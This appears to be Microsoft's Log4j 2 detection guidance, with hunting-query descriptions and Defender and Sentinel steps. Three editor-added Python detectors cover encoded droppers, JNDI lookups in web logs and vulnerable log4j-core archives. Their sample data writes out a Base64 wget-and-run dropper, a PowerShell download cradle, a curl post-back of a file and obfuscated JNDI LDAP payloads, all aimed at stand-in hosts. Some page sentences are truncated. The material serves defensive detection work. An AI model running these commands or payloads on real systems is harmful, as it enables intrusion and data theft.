Microsoft threat research and response

This query surfaces exploitation but may also surface legitimate behavior in some environments. These events warrant further investigation to determine whether they are in fact related to a vulnerable Log4j application.

This query identifies a unique string present in malicious PowerShell commands attributed to threat actors exploiting vulnerable Log4j applications.

This query identifies unique, uncommon PowerShell flags used by curl to post the results of an attacker-executed command back to the command-and-control infrastructure.

Microsoft Defender for IoT has released a dedicated threat intelligence update package for detecting Log4j 2 exploit attempts on the network (the sensor threat intelligence update is shown in the example below). Starting with sensor version , Microsoft Defender for IoT pushes new threat intelligence packages to cloud-connected sensors upon release; working with automatic updates reduces operational effort and ensures greater security. For more information about threat intelligence packages in Defender for IoT, refer to the documentation.

Microsoft Defender for IoT sensor threat intelligence update.

A new Microsoft Sentinel solution has been added to the Content Hub that provides a central place to install Microsoft Sentinel-specific content to monitor, detect, and investigate signals related to exploitation of the Log4j vulnerability.

Log4j Vulnerability Detection solution in Microsoft Sentinel.

To deploy this solution, in the Microsoft Sentinel portal select Content hub (Preview) under Content Management, then search for Log4j in the search bar. Select the Log4j vulnerability detection solution and click Install. Learn how to centrally discover and deploy Microsoft Sentinel out-of-the-box content and solutions.

Microsoft Sentinel Analytics showing detected Log4j vulnerability.

Note: We recommend that you check the solution for updates periodically, as new collateral may be added to this solution given the rapidly evolving situation. This can be verified on the main Content hub page.

This hunting query looks for possible attempts to exploit a remote code execution vulnerability in the Log4j component of Apache. Attackers may attempt to launch arbitrary code by passing crafted strings to a server, which are then logged and evaluated by the Log4j component. It returns a table of suspicious command lines.

This hunting query looks in Azure Web Application Firewall data to find possible exploitation attempts for the CVE involving the Log4j vulnerability.

This hunting query helps detect post-compromise suspicious shell scripts that attackers use for downloading and executing malicious files. This technique is often used by attackers and was recently used in attacks exploiting the vulnerability in the Log4j component of Apache, to evade detection, stay persistent, or carry out further exploitation in the network.

This hunting query helps detect suspicious Base64-encoded, obfuscated scripts that attackers use to encode payloads for downloading and executing malicious files. If possible, it then decodes the malicious command for further analysis. This technique is often used by attackers and was recently used alongside the Log4j vulnerability in order to evade detection and stay persistent in the network.

This query alerts on attempts to terminate processes related to security monitoring. Attackers often try to terminate such processes post-compromise, as seen recently in attacks exploiting the Log4j vulnerability.

This query uses syslog data to alert on any suspicious manipulation of the firewall to evade defenses. Attackers often perform such operations, as seen recently in attacks exploiting the Log4j vulnerability, to enable C2 communications or exfiltration.

This query uses various log sources that contain user agent data to look for exploitation attempts based on the user agent pattern.

This query uses syslog data to alert on any attack toolkits associated with mass scanning or exploitation attempts against a known vulnerability.
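The following is an added example written by the editor, not a query from the Microsoft page and not Defender or Sentinel code: a stand-alone Python counterpart of the Base64-decoding, download-and-execute, and curl post-back hunting logic described above, run over constructed sample command lines. The sample commands, the 198.51.100.x and 203.0.113.x addresses, the indicator regexes, and the function names are all the editor's assumptions, chosen so that each detection is exercised once.

```python
"""Decode Base64-obfuscated command lines and flag download-and-execute
or post-back behaviour (editor's example, not the page's own code)."""
import base64
import binascii
import re
from typing import List, Optional

# Constructed sample process command lines (not real telemetry).
SAMPLE_COMMAND_LINES = [
    # Linux dropper: Base64 blob piped through base64 -d into a shell
    "sh -c 'echo "
    + base64.b64encode(b"wget http://198.51.100.7/x.sh -O /tmp/x; chmod +x /tmp/x; /tmp/x").decode()
    + " | base64 -d | bash'",
    # Windows: PowerShell -EncodedCommand carries UTF-16LE text, not UTF-8
    "powershell.exe -nop -w hidden -enc "
    + base64.b64encode(
        "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.9/a.ps1')".encode("utf-16-le")
    ).decode(),
    # curl posting the output of an earlier command back to a listener
    "curl -s -X POST --data-binary @/tmp/out.txt http://203.0.113.9:8080/",
    # Benign administration
    "ls -la /var/log",
]

# A run of Base64 alphabet characters long enough to be worth decoding
B64_TOKEN = re.compile(r"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{20,}={0,2}(?![A-Za-z0-9+/=])")
# Download tooling; curl only counts when it is not being used to send data
DOWNLOAD = re.compile(
    r"\b(wget\b|curl\b(?![^|;]*(?:-X\s*POST|--data|-d\s+@|--upload-file|-T\s))"
    r"|DownloadString|DownloadFile|Invoke-WebRequest|certutil\b)",
    re.I,
)
EXECUTE = re.compile(r"(chmod\s+\+x|\|\s*(?:ba)?sh\b|Invoke-Expression|\bIEX\b|Start-Process)", re.I)
POSTBACK = re.compile(r"\bcurl\b[^|;]*(?:-X\s*POST|--data|-d\s+@|--upload-file|-T\s)", re.I)


def decode_b64(token: str) -> Optional[str]:
    """Decode one Base64 token to text, trying UTF-8 and then UTF-16LE
    (PowerShell -EncodedCommand). Binary-looking output is rejected."""
    try:
        raw = base64.b64decode(token + "=" * (-len(token) % 4), validate=True)
    except (binascii.Error, ValueError):
        return None
    for encoding in ("utf-8", "utf-16-le"):
        try:
            text = raw.decode(encoding)
        except UnicodeDecodeError:
            continue
        printable = sum(c.isprintable() or c.isspace() for c in text)
        # UTF-16LE text decoded as UTF-8 is half NUL bytes, so it fails this
        # ratio and falls through to the next encoding
        if text and printable / len(text) > 0.9:
            return text
    return None


def analyze(cmdline: str) -> dict:
    """Classify one command line, decoding embedded Base64 first."""
    decoded = []
    for token in B64_TOKEN.findall(cmdline):
        text = decode_b64(token)
        if text:
            decoded.append(text)
    # Judge the visible command and anything it decodes to together
    view = " ".join([cmdline] + decoded)
    checks = (("download", DOWNLOAD), ("execute", EXECUTE), ("postback", POSTBACK))
    tags = [name for name, rx in checks if rx.search(view)]
    if decoded:
        tags.append("base64")
    suspicious = ("download" in tags and "execute" in tags) or "postback" in tags
    return {"cmdline": cmdline, "decoded": decoded, "tags": tags, "suspicious": suspicious}


def find_suspicious(cmdlines: List[str]) -> List[dict]:
    """Return only the command lines worth an analyst's attention."""
    return [r for r in (analyze(c) for c in cmdlines) if r["suspicious"]]


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_COMMAND_LINES):
        print(hit["tags"], hit["decoded"] or hit["cmdline"])
```

The UTF-16LE fallback matters in practice: a PowerShell `-EncodedCommand` blob decodes without error as UTF-8 but reads as text interleaved with NUL bytes, so a decoder that stops at the first successful decode never sees the script. As the page notes for its own queries, these indicator lists will also surface legitimate automation in some environments and should be tuned per estate.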

This query uses syslog data to alert on possible artifacts associated with containers running images related to cryptocurrency mining.

The screenshot below shows all the scenarios that are actively mitigated by Azure Firewall Premium. Customers using Azure Firewall Standard can migrate to Premium by following these directions. Customers new to Azure Firewall Premium can learn more about Firewall Premium. For customers who have already enabled DRS 1. We will continue to monitor threat patterns and modify the above rule in response to emerging attack patterns as required.

An example pattern of attack would appear in a web request log with strings like the following: an attacker performs an HTTP request against a target system, which generates a log entry using Log4j 2; the logged string leverages JNDI to perform a request to the attacker-controlled site.
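As an added example (the editor's Python, not Microsoft's KQL or any code from the page), the following reproduces the request-log and user-agent hunting described above over constructed combined-format access-log lines. It handles the case-conversion, default-value and URL-encoding obfuscations that a plain substring match on the JNDI lookup misses, by collapsing nested lookups from the inside out before testing. The log lines, the 198.51.100.x and 203.0.113.x hosts, and the function names are the editor's assumptions.

```python
"""Detect Log4j 2 JNDI lookup strings in web request logs, including
obfuscated and URL-encoded variants (editor's example, not the page's code)."""
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# Constructed access-log lines in combined format (not real traffic).
SAMPLE_ACCESS_LOG = [
    '198.51.100.23 - - [10/Dec/2021:12:00:01 +0000] "GET /login?user=${jndi:ldap://203.0.113.5:1389/a} HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    # Case-conversion lookups, delivered in the User-Agent header
    '198.51.100.24 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 1024 "-" "${${lower:j}ndi:${lower:l}dap://203.0.113.5:1389/x}"',
    # URL-encoded, using the ${::-x} default-value trick: ${${::-j}ndi:ldap://203.0.113.6/z}
    '198.51.100.25 - - [10/Dec/2021:12:00:03 +0000] "GET /?x=%24%7B%24%7B%3A%3A-j%7Dndi%3Aldap%3A%2F%2F203.0.113.6%2Fz%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    # A non-JNDI lookup string: noisy, but not this exploit
    '198.51.100.26 - - [10/Dec/2021:12:00:04 +0000] "GET /search?q=${date:yyyy} HTTP/1.1" 200 3 "-" "Mozilla/5.0"',
    '198.51.100.27 - - [10/Dec/2021:12:00:05 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

INNERMOST_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)://([^/}\s]+)", re.I)


def evaluate_benign_lookup(body: str) -> Optional[str]:
    """Return what a Log4j 2 lookup expands to when it is only being used
    to assemble another lookup, or None to leave it untouched."""
    low = body.lower()
    if low.startswith("jndi:"):
        return None  # the payload itself: keep it visible for matching
    if low.startswith("lower:"):
        return body[len("lower:"):].lower()
    if low.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:
        # ${key:-default}: the key (empty, or a bogus env/sys name) does
        # not resolve in the target process, so the default text is used
        return body.split(":-", 1)[1]
    return None


def normalize(text: str, max_rounds: int = 16) -> str:
    """URL-decode, then collapse nested lookups from the inside out until
    nothing benign is left to expand."""
    text = unquote(text)
    for _ in range(max_rounds):
        changed = False

        def expand(match) -> str:
            nonlocal changed
            replacement = evaluate_benign_lookup(match.group(1))
            if replacement is None:
                return match.group(0)
            changed = True
            return replacement

        text = INNERMOST_LOOKUP.sub(expand, text)
        if not changed:
            break
    return text


def find_exploit_attempts(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Return (line_index, scheme, callback_target) for every line that
    carries a JNDI lookup once obfuscation is stripped."""
    hits = []
    for index, line in enumerate(lines):
        match = JNDI_LOOKUP.search(normalize(line))
        if match:
            hits.append((index, match.group(1).lower(), match.group(2)))
    return hits


if __name__ == "__main__":
    for index, scheme, target in find_exploit_attempts(SAMPLE_ACCESS_LOG):
        print(f"line {index}: {scheme} lookup to {target}")
```

A hit from this check is an attempt, not a compromise: as the page notes, most of the traffic carrying these strings is mass scanning. The extracted callback target is the useful pivot, since a successful exploitation shows up as an outbound LDAP or RMI connection from the Java process to that host.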

Exploitation continues on non-Microsoft hosted Minecraft servers. Minecraft customers running their own servers are encouraged to deploy the latest Minecraft server update as soon as possible to protect their users.

Access brokers associated with ransomware. MSTIC and the Microsoft Defender team have confirmed that multiple tracked activity groups acting as access brokers have begun using the vulnerability to gain initial access to target networks.

Mass scanning activity continues. The vast majority of traffic observed by Microsoft remains mass scanners, operated by both attackers and security researchers.

Webtoos. The Webtoos malware has DDoS capabilities and persistence mechanisms that could allow an attacker to perform additional activities.

A note on testing services and assumed benign activity. While services such as interact.

Exploitation in internet-facing systems leads to ransomware. As early as January 4, attackers started exploiting the Log4j vulnerability in internet-facing systems running VMware Horizon.

Discovering affected components, software, and devices via a unified Log4j dashboard. Threat and vulnerability management automatically and seamlessly identifies devices affected by the Log4j vulnerabilities and the associated risk in the environment, and significantly reduces time-to-mitigate.

Figure 3. Threat and vulnerability management dedicated CVE dashboard.

Figure 4. Threat and vulnerability management finds exposed paths.

Threat and vulnerability management finds exposed devices based on vulnerable software and vulnerable files detected on disk. Note: Scan results may take some time to reach full coverage, and the number of discovered devices may be low at first but will grow as the scan reaches more devices.

These new capabilities provide security teams with the following: view the mitigation status for each affected device (Figure 6). This feature is currently available for Windows devices only. To view the mitigation options, click the Mitigation options button in the Log4j dashboard. You can choose to apply the mitigation to all exposed devices or select specific devices to which you would like to apply it.

Figure 7. Creating mitigation actions for exposed devices.

Microsoft Defender advanced hunting. Advanced hunting can also surface affected software.
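The following is an added example by the editor, not Microsoft's scanner and not code from the page: a stand-alone Python sketch of the "vulnerable files detected on disk" check described above, run over a constructed directory of sample archives. It reports every log4j-core archive found, including ones embedded in WAR or EAR files, together with its version and whether the JNDI lookup class is still present (its removal being the file-level mitigation whose status the dashboard tracks). The 2.16.0 threshold is the editor's assumption, taken as the release in which Log4j 2 disabled JNDI lookups by default; the sample file names and helper functions are likewise assumptions.

```python
"""Find log4j-core archives on disk, nested ones included, and report
whether JndiLookup is still present (editor's example, not Microsoft's)."""
import io
import os
import re
import shutil
import tempfile
import zipfile
from typing import List, Optional, Tuple

JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_DISABLED_FROM = (2, 16, 0)  # editor's assumption, see lead-in
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")
MAX_NESTING = 3


def parse_version(pom_properties: str) -> Optional[Tuple[int, int, int]]:
    """Pull major.minor.patch from pom.properties; '2.0-beta9' parses as (2, 0, 0)."""
    m = re.search(r"^version=(\d+)\.(\d+)(?:\.(\d+))?", pom_properties, re.M)
    if not m:
        return None
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))


def inspect_archive(zf: zipfile.ZipFile, label: str, depth: int = 0) -> List[dict]:
    """Report log4j-core in this archive, then recurse into embedded archives."""
    findings = []
    names = set(zf.namelist())
    if POM_PROPERTIES in names or JNDI_LOOKUP_CLASS in names:
        version = None
        if POM_PROPERTIES in names:
            version = parse_version(zf.read(POM_PROPERTIES).decode("utf-8", "replace"))
        has_jndi = JNDI_LOOKUP_CLASS in names
        findings.append({
            "label": label,
            "version": version,
            "jndi_lookup_present": has_jndi,
            # Exposed when the lookup class is still shipped and the version
            # predates JNDI being disabled by default; an unknown version with
            # the class present is treated as exposed rather than ignored
            "exposed": has_jndi and (version is None or version < JNDI_DISABLED_FROM),
        })
    if depth < MAX_NESTING:
        for name in sorted(names):
            if name.lower().endswith(ARCHIVE_EXT):
                try:
                    with zipfile.ZipFile(io.BytesIO(zf.read(name))) as inner:
                        findings.extend(inspect_archive(inner, f"{label}!{name}", depth + 1))
                except zipfile.BadZipFile:
                    continue
    return findings


def scan_tree(root: str) -> List[dict]:
    """Walk a directory tree and inspect every archive in it."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for filename in sorted(filenames):
            if not filename.lower().endswith(ARCHIVE_EXT):
                continue
            path = os.path.join(dirpath, filename)
            try:
                with zipfile.ZipFile(path) as zf:
                    findings.extend(inspect_archive(zf, path))
            except zipfile.BadZipFile:
                continue
    return findings


def _sample_jar(version: Optional[str], with_jndi_lookup: bool) -> bytes:
    """Build a tiny stand-in JAR (constructed; the class entry is a placeholder)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        if version:
            zf.writestr(POM_PROPERTIES, f"version={version}\nartifactId=log4j-core\n")
        if with_jndi_lookup:
            zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")
    return buf.getvalue()


def build_sample_tree() -> str:
    """Constructed layout: a vulnerable JAR, one with JndiLookup removed,
    an unrelated JAR, and a WAR embedding a newer log4j-core."""
    root = tempfile.mkdtemp(prefix="log4j-scan-")
    lib = os.path.join(root, "app", "lib")
    os.makedirs(lib)
    files = {
        os.path.join(lib, "log4j-core-2.14.1.jar"): _sample_jar("2.14.1", True),
        os.path.join(lib, "log4j-core-2.14.1-nojndi.jar"): _sample_jar("2.14.1", False),
        os.path.join(lib, "commons-io-2.11.0.jar"): _sample_jar(None, False),
    }
    war = io.BytesIO()
    with zipfile.ZipFile(war, "w") as zf:
        zf.writestr("WEB-INF/lib/log4j-core-2.17.1.jar", _sample_jar("2.17.1", True))
    files[os.path.join(root, "app", "webapp.war")] = war.getvalue()
    for path, data in files.items():
        with open(path, "wb") as fh:
            fh.write(data)
    return root


if __name__ == "__main__":
    sample_root = build_sample_tree()
    try:
        for finding in scan_tree(sample_root):
            print("EXPOSED" if finding["exposed"] else "ok     ", finding["version"], finding["label"])
    finally:
        shutil.rmtree(sample_root)
```

Archive inspection is only part of what the page's dashboard covers: a production check also has to look at exploded class directories and at the classpath of running Java processes, since an application can load log4j-core from outside any archive on disk.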

Microsoft Threat Experts - Targeted Attack Notification provides proactive hunting for the most important threats to your network, including human adversary intrusions, hands-on-keyboard attacks, and advanced attacks like cyber-espionage. This managed threat hunting service provides expert-driven insights and data through two capabilities: targeted attack notifications and access to experts on demand.

If you're a Microsoft Defender for Endpoint customer, you need to apply for Microsoft Threat Experts - Targeted Attack Notifications to get special insights and analysis that help identify the most critical threats in your environment so you can respond to them quickly. Discuss the eligibility requirements with your Microsoft Technical Service provider and account team before you apply. Once accepted, you will get the benefits of Targeted Attack Notifications.

Contact your account team or Microsoft representative to subscribe to Microsoft Threat Experts - Experts on Demand to consult with our threat experts on relevant detections and adversaries that your organization is facing. See Configure Microsoft Threat Experts capabilities for details.
